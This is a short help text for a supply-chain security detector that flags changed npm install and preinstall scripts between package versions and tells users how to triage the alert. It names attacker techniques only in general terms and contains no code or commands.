NPM Suspicious Scripts

Package managers have hooks (scripts) for lifecycle events. NPM uses up to 7 different hooks during package install, and allows not only to run javascript files, but OS commands as well. Things like sudo commands, or even install / preinstall scripts are not recommended, but anyway they are used by the hackers.

This detector finds changes in the scripts' section between current version and previous version to review.

If there is a change between current and previous version in the scripts, that could be a hint that malicious code may be run by the installation process.

Check the change between versions and if it is unintended code then remove this dependency immediately. On the other hand, if it is benign code needed for installation, add a mute for this issue.

Please note that malicious agents take effort to hide malware from code reviews, and use obfuscation techniques that should quickly raise alarms. Decryption, downloads from remote sites, usage of unintended binary files and the like are some of these techniques.